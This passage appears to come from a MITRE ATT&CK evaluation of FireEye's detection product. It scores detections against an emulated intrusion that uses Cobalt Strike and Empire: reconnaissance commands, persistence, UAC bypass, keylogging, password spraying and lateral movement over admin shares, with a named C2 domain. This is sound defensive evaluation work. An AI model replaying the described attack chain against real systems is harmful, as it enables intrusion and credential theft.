(T1010)
None
  
No detection capability demonstrated for this procedure.
8.D.1
Cobalt Strike: Built-in screen capture capability executed to capture screenshot of current window of user Debbie
Screen Capture
(T1113)
None
  
No detection capability demonstrated for this procedure.
Process Injection
(T1055)
None
  
No detection capability demonstrated for this procedure.
9.A.1
Cobalt Strike: 'ls' (List) via Win32 APIs to enumerate a network shared drive (Wormshare) on Conficker (10.0.0.5)
File and Directory Discovery
(T1083)
None
  
No detection capability demonstrated for this procedure.
9.B.1
Cobalt Strike: Built-in download capability executed to a collect file (Shockwave_rackb_diagram.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5)
Data from Network Shared Drive
(T1039)
None
  
No detection capability demonstrated for this procedure.
Exfiltration Over Command and Control Channel
(T1041)
None
  
No detection capability demonstrated for this procedure, though DNS requests for freegoogleadsenseinfo.com (C2 domain) were observed.
DNS requests to freegoogleadsenseinfo.com (C2 domain) (does not count as a detection)
10.A.1
Batch file (autoupdate.bat) previously written to Startup folder executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (update.dat) using Rundll32
Registry Run Keys / Startup Folder
(T1060)
Enrichment
  
The capability enriched cmd.exe executing a file from Startup with an alert for Process Execution Startup. The alert was also tagged with the correct ATT&CK Technique (T1060 - Registry Run Keys / Startup Folder) and Tactic (Persistence).
Telemetry
  
Telemetry showed cmd.exe executing autoupdate.bat from the Startup folder.
Telemetry (Tainted)
  
 
Telemetry showed rundll32.exe executing update.dll with command-line arguments. The telemetry was tainted by the parent alert for Rundll32 Execution (Weak Signal).
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it identified that autoupdate.bat persisted due to its presence in the startup directory. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of cmd.exe executing from Startup with Process Execution Startup alert (tagged with correct ATT&CK Technique, T1060 - Registry Run Keys / Startup Folder and Tactic, Persistence)
Telemetry showing cmd.exe executing autoupdate.bat from Startup folder
Telemetry showing rundll32.exe executing update.dat (tainted by parent Rundll32 Execution alert)
Additional details of rundll32.exe telemetry
Excerpt from the Managed Defense Report indicating autoupdate.bat persisted due to its presence in startup (Specific Behavior)
10.A.2
Scheduled task executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (updater.dll) using Rundll32
Scheduled Task
(T1053)
Telemetry (Tainted)
  
 
Telemetry showed svchost.exe executing rundll32.exe, which executed updater.dll. The telemetry was tainted by the parent Rundll32 Execution alert, which was tagged with a related ATT&CK Technique (T1085 - Rundll32) and Tactic (Defense Evasion, Execution), but did not include information on the use of a Scheduled Task specifically.
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it identified the Resume Viewer Update Checker scheduled task executing updater.dll with rundll32.exe. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Telemetry showing rundll32.exe executing updater.dll
Parent Rundll32 Execution alert that tainted updater.dll telemetry (tagged with related ATT&CK Technique, T1085 - Rundll32, and Tactic, Defense Evasion, Execution; does not include specific Scheduled Task information)
Excerpt from Managed Defense Report indicating the Resume Viewer Update Checker scheduled task executed updater.dll with rundll32.exe (Specific Behavior)
10.B.1
RDP connection to Conficker (10.0.0.5) authenticated using previously added user Jesse
Remote Desktop Protocol
(T1076)
Enrichment
  
The capability enriched a TCP port 3389 connection to 10.0.0.5 (Conficker) with the alert RDP Network Connection (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1076 - Remote Desktop Protocol) and Tactic (Lateral Movement).
Telemetry
  
Telemetry showed a Logon Type 10 (interactive) event for the account Jesse logging on to Conficker.
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it identified the user account Jesse logged on to Conficker via Remote Desktop Protocol. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of port 3389 connection with RDP Network Connection alert (tagged with correct ATT&CK Technique, T1076 - Remote Desktop Protocol, and Tactic, Lateral Movement)
Telemetry showing Logon Type 10 (interactive) event for Jesse logging on to Conficker
Excerpt from Managed Defense Report indicating account Jesse was used to logon via Remote Desktop Protocol (Specific Behavior)
Valid Accounts
(T1078)
Telemetry
  
Telemetry showed a Logon Type 10 (interactive) event for the account Jesse logging on to Conficker.
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it identified that the account Jesse was used to log in to Conficker as part of Lateral Movement. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Telemetry showing Logon Type 10 (interactive) event for Jesse logging on to Conficker
Excerpt from Managed Defense Report indicating account Jesse was used to logon to Conficker as part of Lateral Movement (Specific Behavior)
11.A.1
Legitimate user Bob clicked and executed malicious VBScript (autoupdate.vbs) on 10.0.1.5 (CodeRed)
Scripting
(T1064)
Specific Behavior
  
A Specific Behavior alert was generated for Suspicious PowerShell Usage (Methodology) indicating powershell.exe ran with unusual arguments due to the -enc and -noP command-line arguments. The alert was mapped to a related ATT&CK Technique (T1086 - PowerShell) and the correct Tactic (Execution) and captured the encoded command.
Enrichment
  
The capability enriched wscript.exe with an alert for Wscript Execution (Weak Signal). The alert was tagged with the correct ATT&CK Technique (T1064 - Scripting) and Tactic (Execution).
Indicator of Compromise
  
An Indicator of Compromise alert was generated for EMPIRE RAT (Backdoor) based on a detected string specific to the backdoor. The alert was also mapped to a related ATT&CK Technique (T1086 - PowerShell).
Specific Behavior alert for Suspicious PowerShell Usage showing powershell.exe execution (tagged with related ATT&CK Technique, T1086 - PowerShell, and correct Tactic, Execution)
Additional details on Specific Behavior alert for Suspicious PowerShell Usage
Enrichment of wscript.exe with Wscript Execution alert (tagged with correct ATT&CK Technique, T064 - Scripting, and Tactic, Execution)
Indicator of Compromise alert for EMPIRE RAT (tagged with related ATT&CK Technique, T1086 - PowerShell)
11.B.1
Empire: C2 channel established
Commonly Used Port
(T1043)
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe communicating over TCP port 443. The telemetry was tainted by the parent PowerShell Network Connection alert.
General Behavior (Delayed)
  
 
The Managed Defense Report indicated a General Behavior occurred because it identified that the Empire backdoor communicated with 192.168.0.5 (C2 server) over port 443. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Telemetry showing powershell.exe communicating over TCP port 443 (tainted by parent PowerShell Network Connection alert)
Excerpt from the Managed Defense Report indicating Empire communicated over port 443 (General Behavior)
Additional excerpt from the Managed Defense Report indicating Empire was configured to communicate over port 443 (General Behavior)
Standard Application Layer Protocol
(T1071)
General Behavior (Delayed)
  
 
The Managed Defense Report indicated a General Behavior occurred because it identified that the Empire backdoor was configured to communicate with freegoogleadsenseinfo.com (C2 domain) over HTTPS. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Excerpt from the Managed Defense Report indicating Empire was configured to communicate over HTTPS (General Behavior)
Standard Cryptographic Protocol
(T1032)
General Behavior (Delayed)
  
 
The Managed Defense Report indicated a General Behavior occurred because it identified that the Empire backdoor was configured to communicate with freegoogleadsenseinfo.com (C2 domain) over HTTPS. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Excerpt from the Managed Defense Report indicating Empire was configured to communicate over HTTPS (General Behavior)
12.A.1
Empire: 'route print' via PowerShell
System Network Configuration Discovery
(T1016)
Enrichment
  
The capability enriched route.exe with an alert for Route Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1016 - System Network Configuration Discovery) and Tactic (Discovery).
General Behavior (Delayed)
  
 
The Managed Defense Report indicated a General Behavior occurred because it identified route.exe as a reconnaissance command used. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of route.exe with Route Execution alert (tagged with correct ATT&CK Technique, T1016 - System Network Configuration Discovery, and Tactic, Discovery)
Excerpt from the Managed Defense Report indicating route.exe was a reconnaissance command used (General Behavior)
12.A.2
Empire: 'ipconfig /all' via PowerShell
System Network Configuration Discovery
(T1016)
Enrichment
  
The capability enriched ipconfig.exe with an alert for Ipconfig Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1016 - System Network Configuration Discovery) and Tactic (Discovery).
General Behavior (Delayed)
  
 
The Managed Defense Report indicated a General Behavior occurred because it identified ipconfig.exe as a reconnaissance command used. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of ipconfig.exe with Ipconfig Execution alert (tagged with correct ATT&CK Technique, T1016 - System Network Configuration Discovery, and Tactic, Discovery)
Excerpt from the Managed Defense Report indicating ipconfig.exe was a reconnaissance command used (General Behavior)
12.B.1
Empire: 'whoami /all /fo list' via PowerShell
System Owner / User Discovery
(T1033)
Enrichment
  
The capability enriched whoami.exe with an alert for Whoami Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1033 - System Owner/User Discovery) and Tactic (Discovery).
General Behavior (Delayed)
  
 
The Managed Defense Report indicated a General Behavior occurred because it identified whoami.exe as a reconnaissance command used. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of whoami.exe with Whoami Execution (tagged with correct ATT&CK Technique, T1033 - System Owner/User Discovery, and Tactic, Discovery)
Excerpt from the Managed Defense Report indicating whoami.exe was a reconnaissance command used (General Behavior)
12.C.1
Empire: 'qprocess *' via PowerShell
Process Discovery
(T1057)
Enrichment
  
The capability enriched qprocess.exe with an alert for Qprocess Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1057 - Process Discovery) and Tactic (Discovery).
General Behavior (Delayed)
  
 
The Managed Defense Report indicated a General Behavior occurred because it identified qprocess.exe as a reconnaissance command used. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of qprocess.exe with Qprocess Execution alert (tagged with correct ATT&CK Technique, T1057 - Process Discovery, and Tactic, Discovery)
Excerpt from the Managed Defense Report indicating qprocess.exe was a reconnaissance command used (General Behavior)
12.D.1
Empire: 'net start' via PowerShell
System Service Discovery
(T1007)
Enrichment
  
The capability enriched net.exe with an alert for Net Start Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1007 - System Service Discovery) and Tactic (Discovery).
General Behavior (Delayed)
  
 
The Managed Defense Report indicated a General Behavior occurred because it identified net.exe as a reconnaissance command used. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of net.exe with Net Start Command Execution alert (tagged with correct ATT&CK Technique, T1007 - System Service Discovery, and Tactic, Discovery)
Excerpt from the Managed Defense Report indicating net.exe was a reconnaissance command used (General Behavior)
12.E.1
Empire: Built-in WinEnum module executed to programmatically execute a series of enumeration techniques
Scripting
(T1064)
Enrichment
  
The capability enriched powershell.exe with an alert for PowerShell Execution (Weak Signal). The alert was also tagged with a related ATT&CK Technique (T1086 - PowerShell).
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it identified that a PowerShell command was run from the Empire process. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of powershell.exe with PowerShell Execution alert (tagged with related ATT&CK Technique T1086 - PowerShell)
Excerpt from the Managed Defense Report indicating a PowerShell command was run from Empire (Specific Behavior)
12.E.1.1
Empire: WinEnum module included enumeration of user information
System Owner / User Discovery
(T1033)
None
  
No detection capability demonstrated for this procedure.
12.E.1.2
Empire: WinEnum module included enumeration of AD group memberships
Permission Groups Discovery
(T1069)
None
  
No detection capability demonstrated for this procedure, though telemetry showed loading of an assembly associated with accessing Active Directory security principals.
Telemetry showing loading of System.DirectoryServices.AccountManagement assembly (does not count as a detection)
12.E.1.3
Empire: WinEnum module included enumeration of password policy information
Password Policy Discovery
(T1201)
None
  
No detection capability demonstrated for this procedure.
12.E.1.4.1
Empire: WinEnum module included enumeration of recently opened files
File and Directory Discovery
(T1083)
None
  
No detection capability demonstrated for this procedure.
12.E.1.4.2
Empire: WinEnum module included enumeration of interesting files
File and Directory Discovery
(T1083)
None
  
No detection capability demonstrated for this procedure.
12.E.1.5
Empire: WinEnum module included enumeration of clipboard contents
Clipboard Data
(T1115)
Indicator of Compromise (Delayed)
  
 
The Managed Defense Report indicated an Indicator of Compromise detection occurred because it identified that the attacker executed the Windows Clipboard capability in Empire. The capability separately showed a PowerShell Execution (Weak Signal) alert containing the encoded PowerShell command. This command could be decoded, but this was not counted as a separate detection because it was external to the capability. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Excerpt from the Managed Defense Report indicating the attacker executed the Windows Clipboard capability of Empire (Indicator of Compromise)
PowerShell Execution alert containing encoded PowerShell command (does not count as a detection)
Decoding (outside the capability) of encoded PowerShell command to show Windows.Clipboard details (does not count as a detection)
12.E.1.6.1
Empire: WinEnum module included enumeration of system information
System Information Discovery
(T1082)
None
  
No detection capability demonstrated for this procedure.
12.E.1.6.2
Empire: WinEnum module included enumeration of Windows update information
System Information Discovery
(T1082)
None
  
No detection capability demonstrated for this procedure.
12.E.1.7
Empire: WinEnum module included enumeration of system information via a Registry query
Query Registry
(T1012)
None
  
No detection capability demonstrated for this procedure.
12.E.1.8
Empire: WinEnum module included enumeration of services
System Service Discovery
(T1007)
None
  
No detection capability demonstrated for this procedure.
12.E.1.9.1
Empire: WinEnum module included enumeration of available shares
Network Share Discovery
(T1135)
None
  
No detection capability demonstrated for this procedure.
12.E.1.9.2
Empire: WinEnum module included enumeration of mapped network drives
Network Share Discovery
(T1135)
None
  
No detection capability demonstrated for this procedure.
12.E.1.10.1
Empire: WinEnum module included enumeration of AV solutions
Security Software Discovery
(T1063)
None
  
No detection capability demonstrated for this procedure.
12.E.1.10.2
Empire: WinEnum module included enumeration of firewall rules
Security Software Discovery
(T1063)
None
  
No detection capability demonstrated for this procedure.
12.E.1.11
Empire: WinEnum module included enumeration of network adapters
System Network Configuration Discovery
(T1016)
None
  
No detection capability demonstrated for this procedure.
12.E.1.12
Empire: WinEnum module included enumeration of established network connections
System Network Connections Discovery
(T1049)
Enrichment
  
The capability enriched netstat.exe with an alert for Netstat Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1049 - System Network Connection Discovery) and Tactic (Discovery).
General Behavior (Delayed)
  
 
The Managed Defense Report indicated a General Behavior occurred because it identified netstat.exe as a reconnaissance command used. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of netstat.exe with Netstat Execution alert (tagged with correct ATT&CK Technique, T1049 - System Network Connections Discovery, and Tactic, Discovery)
Excerpt from the Managed Defense Report indicating netstat.exe was a reconnaissance command used (General Behavior)
12.F.1
Empire: 'net group "Domain Admins" /domain' via PowerShell
Permission Groups Discovery
(T1069)
Enrichment
  
The capability enriched net.exe with an alert for Net Group Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1069 - Permission Groups Discovery) and Tactic (Discovery).
General Behavior (Delayed)
  
 
The Managed Defense Report indicated a General Behavior occurred because it identified net.exe as a reconnaissance command used. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of net.exe with Net Group Command Execution alert (tagged with correct ATT&CK Technique, T1069 - Permission Groups Discovery, and Tactic, Discovery)
Excerpt from the Managed Defense Report indicating net.exe was a reconnaissance command used (General Behavior)
12.F.2
Empire: 'net localgroup administrators' via PowerShell
Permission Groups Discovery
(T1069)
Enrichment
  
The capability enriched net.exe with an alert for Net Group Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1069 - Permission Groups Discovery) and Tactic (Discovery).
General Behavior (Delayed)
  
 
The Managed Defense Report indicated a General Behavior occurred because it identified net.exe as a reconnaissance command used. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of net.exe with command-line arguments (tagged with correct ATT&CK Technique, T1069 - Permission Groups Discovery, and Tactic, Discovery)
Excerpt from the Managed Defense Report indicating net.exe was a reconnaissance command used (General Behavior)
12.G.1
Empire: 'net user' via PowerShell
Account Discovery
(T1087)
Enrichment
  
The capability enriched net.exe with an alert for Net User Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1087 - Account Discovery) and Tactic (Discovery).
General Behavior (Delayed)
  
 
The Managed Defense Report indicated a General Behavior occurred because it identified net.exe as a reconnaissance command used to capture information about local users. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of net.exe with Net User Command Execution alert (tagged with correct ATT&CK Technique, T1087 - Account Discovery, and Tactic, Discovery)
Excerpt from the Managed Defense Report indicating net.exe was a reconnaissance command used to capture information about local users (General Behavior)
12.G.2
Empire: 'net user /domain' via PowerShell
Account Discovery
(T1087)
Enrichment
  
The capability enriched net.exe with an alert for Net User Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1087 - Account Discovery) and Tactic (Discovery).
General Behavior (Delayed)
  
 
The Managed Defense Report indicated a General Behavior occurred because it identified net.exe as a reconnaissance command used. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of net.exe with Net User Command Execution alert (tagged with correct ATT&CK Technique, T1087 - Account Discovery, and Tactic, Discovery)
Excerpt from the Managed Defense Report indicating net.exe was a reconnaissance command used (General Behavior)
13.A.1
Empire: 'net group "Domain Computers" /domain' via PowerShell
Remote System Discovery
(T1018)
Enrichment
  
The capability enriched net.exe with an alert for Net Group Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1018 - Remote System Discovery) and Tactic (Discovery).
General Behavior (Delayed)
  
 
The Managed Defense Report indicated a General Behavior occurred because it identified net.exe as a reconnaissance command used. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of net.exe with Net Group Command Execution alert (tagged with correct ATT&CK Technique, T1018 -Remote System Discovery, and Tactic, Discovery)
Excerpt from the Managed Defense Report indicating net.exe was a reconnaissance command used (General Behavior)
13.B.1
Empire: 'net use' via PowerShell
System Network Connections Discovery
(T1049)
Enrichment
  
The capability enriched net.exe with an alert for Net Use Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1049 - System Network Connections Discovery) and Tactic (Discovery).
General Behavior (Delayed)
  
 
The Managed Defense Report indicated a General Behavior occurred because it identified net.exe as a reconnaissance command used. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of net.exe with Net Group Command Execution alert (tagged with correct ATT&CK Technique, T1049 -System Network Connections Discovery, and Tactic, Discovery)
Excerpt from the Managed Defense Report indicating net.exe was a reconnaissance command used (General Behavior)
13.B.2
Empire: 'netstat -ano' via PowerShell
System Network Connections Discovery
(T1049)
Enrichment
  
The capability enriched netstat.exe with an alert for Netstat Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1049 - System Network Connections Discovery) and Tactic (Discovery).
General Behavior (Delayed)
  
 
The Managed Defense Report indicated a General Behavior occurred because it identified netstat.exe as a reconnaissance command used. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of netstat.exe with Netstat Execution alert (tagged with correct ATT&CK Technique, T1049 - System Network Connections Discovery, and Tactic, Discovery)
Excerpt from the Managed Defense Report indicating netstat.exe was a reconnaissance command used (General Behavior)
13.C.1
Empire: 'reg query' via PowerShell to enumerate a specific Registry key
Query Registry
(T1012)
Enrichment
  
The capability enriched reg.exe with an alert for Reg Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1012 - Query Registry) and Tactic (Discovery).
General Behavior (Delayed)
  
 
The Managed Defense Report indicated a General Behavior occurred because it identified reg.exe as a reconnaissance command used. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of reg.exe with Reg Execution alert (tagged with ATT&CK Technique T1018 - Query Registry, and Tactic, Discovery)
Excerpt from the Managed Defense Report indicating reg.exe was a reconnaissance command used (General Behavior)
14.A.1
Empire: UAC bypass module downloaded and executed a new Empire stager (wdbypass)
Bypass User Account Control
(T1088)
Telemetry (Configuration Change)
  
 
Telemetry showed execution of powershell.exe as a high integrity process as SYSTEM with a token login ID previously associated with user Bob, which indicates UAC bypassing. A Configuration Change was made in order to collect Windows Event Logs for events 4627 (Group Membership Information) and 4673 (A privileged service was called).
Telemetry showing execution of powershell.exe running as SYSTEM with token login ID 0x10530b3
Telemetry showing group membership of token logon ID 0x10530b3 associated with user Bob, which includes S-1-16-12288 (High Mandatory Level)
Commonly Used Port
(T1043)
Telemetry (Tainted)
  
 
Telemetry showed a connection to freegoogleadsenseinfo.com (C2 domain) over TCP port 8080. The telemetry was tainted by the parent PowerShell URL Request (Weak Signal) alert.
General Behavior (Delayed)
  
 
The Managed Defense Report indicated a General Behavior occurred because it identified that the Empire instance communicated with freegoogleadsenseinfo.com (C2 domain) over port 8080. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Telemetry showing TCP port 8080 connection to freegoogleadsenseinfo.com (C2 domain) (tainted by parent PowerShell URL Request alert)
Excerpt from the Managed Defense Report indicating Empire communicated over port 8080 (General Behavior)
Additional excerpt from the Managed Defense Report indicating Empire was configured to communicate over port 8080 (General Behavior)
Remote File Copy
(T1105)
Enrichment
  
The capability enriched a HTTP GET request for wdbypass with an alert for PowerShell URL Request (Weak Signal). The alert also was also tagged with the correct ATT&CK Technique (T1105 - Remote File Copy) and Tactic (Command and Control).
Enrichment of HTTP GET request for wdbypass with PowerShell URL Request alert (tagged with correct ATT&CK Technique, T1105 - Remote File Copy, and Tactic, Command and Control)
Standard Application Layer Protocol
(T1071)
Enrichment
  
The capability enriched a HTTP GET request with an alert for PowerShell URL Request (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1071 - Standard Application Layer Protocol) and Tactic (Command and Control).
Enrichment of HTTP GET request with PowerShell URL Request alert (tagged with correct ATT&CK Technique, T1071 - Standard Application Layer Protocol, and Tactic, Command and Control)
15.A.1
Empire: Built-in keylogging module executed to capture keystrokes of user Bob
Application Window Discovery
(T1010)
None
  
No detection capability demonstrated for this procedure.
Input Capture
(T1056)
None
  
No detection capability demonstrated for this procedure, though the capability detected PowerShell activity during the time of the keylogging.
PowerShell activity during the time of the keylogging (does not count as detection)
15.B.1
Empire: 'get-content' via PowerShell to collect sensitive file (it_tasks.txt) from a network shared drive (Wormshare) on Conficker (10.0.0.5)
Credentials in Files
(T1081)
None
  
No detection capability demonstrated for this procedure.
16.A.1
Empire: 'net use' via PowerShell to brute force password spraying authentication attempts to Morris (10.0.1.4) and Nimda (10.0.1.6) targeting credentials of users Kmitnick, Bob, and Frieda
Brute Force
(T1110)
Enrichment
  
The capability enriched repeated logon attempts via net.exe with an alert for Net Use Command Execution (Weak Signal). The alert was also tagged with a related ATT&CK Technique (T1077 - Windows Admin Share) and Tactic (Lateral Movement).  The four events were included under the same alert and each of the passwords were redacted by the capability. The vendor indicated the un-redacted passwords could be observed in triage/acquistion data.
Telemetry (Configuration Change)
  
 
Telemetry showed the logon failure from Kmitnick by searching for Windows Security Log Event ID 4625. A configuration change was made to allow for the capture of Windows Security Event ID 4625.
General Behavior (Delayed)
  
 
The Managed Defense Report indicated a General Behavior occurred because it identified that the attacker attempted to access systems using four accounts. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of net.exe with Net Use Command Execution alert (showing logon attempts for the user Frieda; tagged with related ATT&CK Technique, T1077 - Windows Admin Share, and Tactic, Lateral Movement)
Enrichment of net.exe with Net Use Command Execution alert (showing logon attempts for the user Bob; tagged with related ATT&CK Technique, T1077 - Windows Admin Share, and Tactic, Lateral Movement)
Enrichment of net.exe with Net Use Command Execution alert (showing logon attempts for the user Kmitnick; tagged with related ATT&CK Technique, T1077 - Windows Admin Share, and Tactic, Lateral Movement)
Enrichment of net.exe with Net Use Command Execution alert (showing logon attempts for the user Kmitnick; tagged with related ATT&CK Technique, T1077 - Windows Admin Share, and Tactic, Lateral Movement)
Telemetry showing failed logon attempt for Kmitnick
Excerpt from the Managed Defense Report indicating the attacker attempted to access systems using four accounts (General Behavior)
Windows Admin Shares
(T1077)
Enrichment
  
The capability enriched net.exe with an alert for Net Use Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1077 - Windows Admin Shares) and Tactic (Lateral Movement). The four events were included under the same alert.
Enrichment of net.exe with Net Use Command Execution alert (tagged with correct ATT&CK Technique T1077 - Windows Admin Shares, and Tactic, Lateral Movement) for user Frieda
Enrichment of net.exe with Net Use Command Execution alert (tagged with correct ATT&CK Technique T1077 - Windows Admin Shares, and Tactic, Lateral Movement) for user Bob
Enrichment of net.exe with Net Use Command Execution alert (tagged with correct ATT&CK Technique T1077 - Windows Admin Shares, and Tactic, Lateral Movement) for user Kmitnick
Enrichment of net.exe with Net Use Command Execution alert (tagged with correct ATT&CK Technique T1077 - Windows Admin Shares, and Tactic, Lateral Movement) for user Kmitnick
16.B.1
Empire: 'net use' via PowerShell to successfully authenticate to Conficker (10.0.0.5) using credentials of user Kmitnick
Windows Admin Shares
(T1077)
Enrichment
  
The capability enriched a logon attempt via net.exe with an alert for Net Use Command Execution (Weak Signal). The alert details showed net.exe with command-line arguments targeting ADMIN$ using valid credentials for user Kmitnick. The alert was also tagged with the correct ATT&CK Technique (T1077 - Windows Admin Shares) and Tactic (Lateral Movement).
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it identified that the attacker accessed Conficker by mounting the ADMIN$ share. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of net.exe logon attempt to ADMIN$ with Net Use Command Execution alert (tagged with the correct ATT&CK Technique, 1077 - Windows Admin Shares, and Tactic, Lateral Movement)
Excerpt from the Managed Defense Report indicating the attacker accessed Conficker by mounting the ADMIN$ share (Specific Behavior)
Valid Accounts
(T1078)
Enrichment
  
The capability enriched a logon attempt via net.exe using valid credentials for user Kmitnick with an alert for Net Use Command Execution (Weak Signal). The password for Kmitnick was redacted within the capability. The vendor indicated the un-redacted passwords could be observed in triage/acquistion data.
Telemetry
  
Telemetry showed the successful logon for the user Kmitnick. 
Enrichment of net.exe logon attempt by Kmitnick with Net Use Command Execution alert
Telemetry showing successful logon of user Kmitnick
Brute Force
(T1110)
Enrichment
  
The capability enriched net.exe with an alert for Net Use Command Execution (Weak Signal). The alert was also tagged with a related ATT&CK Technique (T1077 - Windows Admin Shares) and Tactic (Lateral Movement).
Telemetry
  
Telemetry showed the successful logon for the user Kmitnick.
Enrichment of net.exe with Net Use Command Execution alert (tagged with related ATT&CK Technique T1077 - Windows Admin Shares, and Tactic, Lateral Movement)
Telemetry showing successful logon of user Kmitnick
16.C.1
Empire: 'net use /delete' via PowerShell
Network Share Connection Removal
(T1126)
Telemetry
  
Telemetry showed net.exe executing with command-line arguments.
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it identified that the attacker unmounted the share from CodeRed. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Telemetry showed net.exe executing with command-line arguments.
Excerpt from the Managed Defense Report indicating the attacker unmounted the share from CodeRed (Specific Behavior)
16.D.1
Empire: Successful authentication targeted Windows admin shares on Conficker (10.0.0.5)
Windows Admin Shares
(T1077)
Enrichment
  
The capability enriched net1.exe with an alert for Net Use Command Execution (Weak Signal). The alert also was tagged with the correct ATT&CK Technique (T1077 - Windows Admin Shares) and Tactic (Lateral Movement).
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it identified that the attacker mounted the C$ drive on creeper with the kmitnick account. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of net1.exe with Net Use Command Execution alert (tagged with correct ATT&CK Technique, T1077 - Windows Admin Shares, and Tactic, Lateral Movement)
Excerpt from the Managed Defense Report indicating the attacker mounting the C$ on creeper with the kmitnick account (Specific Behavior)
Valid Accounts
(T1078)
Enrichment
  
